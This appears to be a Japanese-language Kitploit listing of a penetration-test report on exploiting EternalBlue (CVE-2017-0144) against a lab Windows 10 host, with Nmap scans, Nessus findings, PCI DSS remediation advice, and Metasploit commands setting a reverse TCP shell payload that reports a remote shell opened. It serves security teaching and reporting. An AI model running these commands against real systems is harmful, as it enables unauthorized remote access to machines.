Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint — このレポートは、金融志向のインフラストラクチャ内のWindows 10マシンにおいて、PCI DSS準拠、SMBサービス列挙、およびCVE-2017-0144(EternalBlue)の悪用に焦点を当てた構造化されたVAPTエンゲージメントの概要を示しています。 | Kitploit
ツール/GitHubGitHub/adityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint
偵察脆弱性分析エクスプロイトネットワークセキュリティペネトレーションテスト学習と教育
GitHubadityabhatt3010/vapt-report-on-smb-exploitation-in-windows-10-finance-endpoint

VAPT-Report-on-SMB-Exploitation-in-Windows-10-Finance-Endpoint

このレポートは、金融志向のインフラストラクチャ内のWindows 10マシンにおいて、PCI DSS準拠、SMBサービス列挙、およびCVE-2017-0144(EternalBlue)の悪用に焦点を当てた構造化されたVAPTエンゲージメントの概要を示しています。

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
1511年前未レビュー

Windows 10 ファイナンスエンドポイントにおける SMB 悪用に関する VAPT レポート

本レポートは、金融指向のインフラストラクチャ内の Windows 10 マシンにおける、PCI DSS 準拠、SMB サービス列挙、および CVE-2017-0144 (EternalBlue) の悪用に焦点を当てた、構造化された VAPT エンゲージメントの概要を示しています。


🔐 はじめに

金融機関は、サイバーセキュリティ分野において最も厳格なコンプライアンス要件に直面しています。機密性の高い顧客データやカード会員情報が危険にさらされているため、セキュリティ設定の誤りは壊滅的な情報漏洩につながる可能性があります。この VAPT シミュレーションは、PCI DSS 準拠の観点から Windows 10 ベースのエンドポイントシステムのセキュリティ態勢を評価すると同時に、公開された SMB サービスにおける既知の脆弱性を特定して悪用するために実施されました。

シミュレーションは、Nessus を使用した偵察と脆弱性スキャンから、Metasploit による実際の悪用に至るまでの複数の段階をカバーしています。このレポートは、金融ネットワークの整合性を維持する上でのエンドポイントの強化、パッチ管理、ファイアウォールの適用、および PCI DSS への準拠の重要性をさらに強調しています。

Aditya Bhatt


脆弱性評価および侵入テスト (VAPT) レポート

対象: Windows 10 ホスト – 金融セクターエンドポイント

作成者: Aditya Bhatt
役職: VAPT アナリスト | サイバーセキュリティ専門家
連絡先: [email protected] | +91-9818993884


エグゼクティブサマリー

本レポートは、金融データやクレジットカード取引を扱っていると疑われる Windows 10 エンドポイントに対して実施された侵入テストの結果を示しています。目的は、PCI DSS の管理策の実装を検証し、カード会員データを危険にさらす可能性のある攻撃ベクトルを特定することでした。

Nessus を使用したところ、ホストが重大な SMB 脆弱性である CVE-2017-0144 (EternalBlue) に対して脆弱であることが判明しました。その後、Metasploit フレームワークを使用してこの欠陥を悪用し、不正なリモートシェルアクセスを取得しました。このレポートは、金融システムにおけるデータ漏洩を回避するためのタイムリーなパッチ管理とネットワークサービスの強化の重要性を強調しています。


目的

  • 対象エンドポイントにおける PCI DSS 要件の準拠を評価する。
  • Windows 10 システム上の脆弱性を列挙して特定する。
  • 標準的なツールと手法を使用して発見された脆弱性を悪用する。
  • システムのセキュリティとコンプライアンスを改善するための是正措置を推奨する。

方法論

タスク 1: PCI DSS コンプライアンス評価

PCI DSS の 6 つの主要な目的と 12 の要件が見直されました。主な原則は次のとおりです。

  • ファイアウォールの実装とベンダーのデフォルト設定の変更
  • 保管時および転送時のカード会員データの暗号化
  • アンチウイルス、安全な構成、パッチ管理の使用
  • アクセス制御と認証メカニズムの実施
  • 監視、ログ記録、および定期的な脆弱性スキャンの実施
  • 組織全体のセキュリティポリシーの作成と実施

タスク 2: 脆弱性の発見

対象システム:

  • Windows 10 VM
  • IP アドレス: 10.10.195.105
  • サブネット: 255.0.0.0

使用ツール:

  • Nmap (ポートおよびサービス発信用)
  • Nessus (脆弱性スキャン用)
  • Metasploit (悪用用)

主要コマンド:

root@kitploit:~
nmap -sn 10.10.195.105

5

root@kitploit:~
nmap -sV -p445 10.10.195.105

6

root@kitploit:~
nmap -F 10.10.195.105

1

  • ポート 445 (SMB) が開いていることを確認
  • Nessus により脆弱性 CVE-2017-0144 (EternalBlue) を特定

2 png
3
4


タスク 3: 悪用

スキャナー:

Nessus スキャンの試行:

7
8
9
10
11
12
13
14
15

Metasploit スキャンの試行:

root@kitploit:~
use scanner/smb/smb_ms17_010
set RHOSTS 10.10.195.105
run

16
17

エクスプロイトモジュール:

root@kitploit:~
use exploit/windows/smb/ms17_010_eternalblue
set payload generic/shell_reverse_tcp
set RHOSTS 10.10.195.105
set LHOST 10.17.88.138
exploit

18
19
20

  • 結果: 対象の Windows 10 マシンでリモートシェルが正常に開かれました
  • 機密システムへの不正アクセスが確認されました

主な発見事項

  • SMBv1 がアクティブでネットワークに公開されている
  • EternalBlue (MS17-010) が未パッチで悪用可能
  • Nessus スキャンにより複数の高深刻度の脆弱性が明らかになった
  • 横方向の移動を防ぐファイアウォールやネットワークセグメンテーションがない
  • デフォルトのネットワークサービスが不必要に開かれている

リスク分析


推奨事項

  1. パッチ管理

    • CVE-2017-0144 に対する Microsoft のセキュリティ更新プログラムを直ちに適用する
    • 継続的な脆弱性スキャンとパッチサイクルを実施する
  2. ネットワークの強化

    • SMBv1 プロトコルを完全に無効にする
    • SMB サービスへのアクセスを内部の信頼できるネットワークのみに制限する
  3. ファイアウォールの適用

    • パブリックインターフェースでポート 445 をブロックする
    • IPS/IDS を使用して SMB ベースの攻撃をリアルタイムで検出する
  4. 継続的な監視

    • SIEM ツールを導入して異常を検出し、イベントを相関付ける
    • 新しいリスクを評価するために頻繁な Nessus スキャンをスケジュールする
  5. PCI DSS コンプライアンス

    • 多要素認証と最小権限アクセスを実施する
    • すべてのカード会員データを転送中および保存中に暗号化する
    • 完全な管理カバレッジを確保するために定期的な監査を実施する
  6. 意識向上トレーニング

    • IT チームと利害関係者に対して定期的なトレーニングセッションを実施する
    • 金融データの安全な取り扱いと脆弱性対応手順を含める

結論

このエンゲージメントは、SMBv1 のような未パッチで時代遅れのサービスが、公開されているエクスプロイトを使用してシステム全体を危険にさらす可能性があることを明確に示しました。ここで悪用された EternalBlue 脆弱性は、金融インフラにおいてタイムリーなパッチ適用、サービスの最小化、およびプロアクティブなスキャンが譲れない理由を示す典型的な例です。

PCI DSS などのフレームワークへの準拠がなければ、組織は法的制裁と壊滅的なデータ漏洩の両方のリスクを負うことになります。


🛡️ 最後に

セキュリティのギャップは、多くの場合、レガシープロトコルや忘れ去られたパッチの背後に隠れています。このエンゲージメントは、すべてのサービス、特に SMB のようなサービスを利便性としてではなく、リスク表面として扱うことの重要性を再確認しました。

金融セクターにおける強力なサイバーセキュリティは、継続的な警戒、実施されたポリシー、そして妥協のないパッチ管理から始まります。

このレポートをお読みいただきありがとうございます。このレポートが、特に金融データを扱う際に継続的なセキュリティ検証が不可欠である理由について、明確さ、実践的な洞察、そして再確認を提供できたことを願っています。

– Aditya Bhatt
VAPT アナリスト | サイバーセキュリティ専門家

ツールをダウンロード
リスクの説明影響可能性リスクスコア
EternalBlue 悪用 (SMBv1)高高重大
パッチ管理の欠如高中高
ネットワークアクセス制御の欠如中高高
PCI DSS 非準拠高高重大